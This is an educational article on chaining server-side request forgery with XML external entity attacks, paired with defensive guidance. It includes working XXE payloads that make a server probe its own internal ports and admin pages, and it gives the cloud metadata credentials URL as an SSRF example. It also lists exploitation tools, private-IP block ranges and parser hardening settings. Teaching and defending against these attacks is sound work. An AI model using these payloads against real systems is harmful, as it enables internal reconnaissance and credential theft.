Understanding SSRF in a XXE Context
Cybersecurity threats become exponentially more dangerous when multiple vulnerabilities are chained together. Server-Side Request Forgery (SSRF) and XML External Entity (XXE) processing represent one such powerful combination, enabling attackers to scan internal networks, exfiltrate sensitive data, and compromise backend systems while bypassing traditional perimeter defenses.
Key Points
- SSRF manipulates servers into making unauthorized requests to internal or external systems through unvalidated user input
- XXE exploits misconfigured XML parsers to access local files, make HTTP requests, or execute code
- Combined attacks enable internal network reconnaissance, data theft, and lateral movement across systems
- Both vulnerabilities are preventable through proper input validation, secure parser configuration, and network segmentation
- Cloud metadata services (AWS, Azure, GCP) are prime targets for SSRF+XXE exploitation
What is Server-Side Request Forgery (SSRF)?
SSRF vulnerabilities occur when applications process user-supplied URLs or endpoints without proper validation, allowing attackers to force the server to make requests on their behalf.
Common Attack Scenarios:
- Querying internal databases or admin panels not exposed to the internet
- Accessing cloud metadata services to steal temporary credentials
- Port scanning internal networks to map infrastructure
- Bypassing IP-based access controls and firewalls
Real-World Example: An attacker submits
http://169.254.169.254/latest/meta-data/iam/security-credentials/to a vulnerable image processing service, forcing it to retrieve AWS credentials from the instance metadata service.
What is XML External Entity (XXE) Processing?
XXE vulnerabilities exploit weakly configured XML parsers by injecting malicious external entities into XML input. When the parser processes these entities, it executes unintended actions.
Attack Capabilities:
- File Disclosure: Read local files like
/etc/passwdor configuration files - Remote Requests: Force the server to make HTTP/HTTPS requests
- Denial of Service: Trigger resource exhaustion through recursive entity expansion
- Code Execution: In rare cases with specific parser configurations
Security Note: XXE is listed in the OWASP Top 10 due to its widespread prevalence and critical severity. Many legacy systems remain vulnerable due to outdated XML parser configurations.
The Combined Threat: SSRF via XXE
When XXE and SSRF are chained together, attackers gain a powerful reconnaissance and exploitation toolkit that operates from within the trusted server environment.
Attack Advantages:
- Bypass firewall rules that block external attackers
- Access internal services without authentication
- Enumerate network topology and identify vulnerable services
- Pivot to additional systems using discovered credentials
Attack Methodology
Step 1: Crafting the XXE Payload
Attackers inject malicious XML containing external entity declarations that force the server to make requests:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:§PORT§/" >
]>
<contact>
<name>&xxe;</name>
<email>attacker@example.com</email>
<message>Test payload</message>
</contact>
The SYSTEM keyword instructs the XML parser to fetch content from the specified URL. The §PORT§ marker indicates a variable position for automated scanning.
Step 2: Automated Network Reconnaissance
Using tools like Burp Suite Intruder, attackers automate internal port scanning:
| Step | Action | Tool/Technique |
|---|---|---|
| Intercept | Capture the XML request through a proxy | Burp Proxy |
| Configure | Mark the port number as a payload position | Burp Intruder |
| Fuzz | Test sequential port numbers (1-65535) | Payload lists |
| Analyze | Sort responses by length to identify open ports | Burp Comparer |
| Exploit | Target discovered services with refined payloads | Custom XXE |
Detection Technique: Responses from open ports typically differ in size or content from closed ports, making them identifiable through response analysis.
Step 3: Exploiting Discovered Services
Once an open port is identified (e.g., port 81 running an admin interface), attackers refine their payload:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:81/admin" >
]>
<contact>
<name>&xxe;</name>
<email>attacker@example.com</email>
<message>Access granted</message>
</contact>
Potential Outcomes:
- Unauthorized access to administrative interfaces
- Exposure of internal API endpoints and documentation
- Retrieval of database connection strings or credentials
- Further exploitation when combined with additional vulnerabilities
Defense Strategies
For Development Teams
Disable XXE Processing:
- Configure XML parsers to reject external entities entirely
- Use secure parser settings (e.g.,
XMLConstants.FEATURE_SECURE_PROCESSINGin Java) - Implement strict allowlists for XML input validation
- Consider using JSON instead of XML when possible
Prevent SSRF Attacks:
- Validate and sanitize all user-supplied URLs
- Implement allowlists for permitted domains and IP ranges
- Block requests to private IP ranges (
10.0.0.0/8,172.16.0.0/12,192.168.0.0/16,127.0.0.0/8) - Disable unnecessary URL schemes (e.g.,
file://,gopher://,dict://) - Use network segmentation to isolate sensitive internal services
Code Example (Java):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
For Security Teams
Monitoring and Detection:
- Alert on outbound requests to localhost, private IPs, or cloud metadata endpoints
- Log XML parsing errors and suspicious entity declarations
- Monitor for unusual patterns in application logs (e.g.,
SYSTEMkeywords) - Implement rate limiting on XML processing endpoints
Regular Security Assessments:
- Conduct penetration testing focused on XXE and SSRF vulnerabilities
- Use automated scanners (OWASP ZAP, Burp Scanner) in CI/CD pipelines
- Review XML parser configurations across all applications
- Test with known malicious payloads from public repositories
Real-World Impact
Case Study: In 2017, a major cloud provider experienced a significant data breach when attackers chained SSRF and XXE vulnerabilities to access internal metadata services. The attack yielded temporary credentials that enabled further exploitation of customer environments.
High-Value Targets:
- Cloud Environments: AWS, Azure, and GCP metadata services at
169.254.169.254 - Internal APIs: Microservices and REST endpoints not exposed externally
- Legacy Systems: Applications using outdated XML parsers without security patches
- Container Orchestration: Kubernetes API servers and Docker daemons
- Database Interfaces: Internal database management tools and admin panels
Financial Impact: Organizations affected by SSRF+XXE attacks face costs including incident response, regulatory fines, customer notification, and reputational damage averaging millions of dollars per incident.
Testing Tools and Resources
Security Testing Tools
| Tool | Purpose | Use Case |
|---|---|---|
| Burp Suite | Intercept and modify HTTP requests | Manual XXE/SSRF testing and automation |
| OWASP ZAP | Automated vulnerability scanning | CI/CD integration and baseline scanning |
| XXEinjector | Specialized XXE exploitation | Advanced file retrieval and OOB testing |
| Metasploit | Comprehensive exploitation framework | Post-exploitation and lateral movement |
| SSRFmap | SSRF exploitation automation | Cloud metadata extraction and port scanning |
Payload Resources
- [PayloadBox XXE Injection Payloads](https://github.com/payloadbox/xxe-injection-payload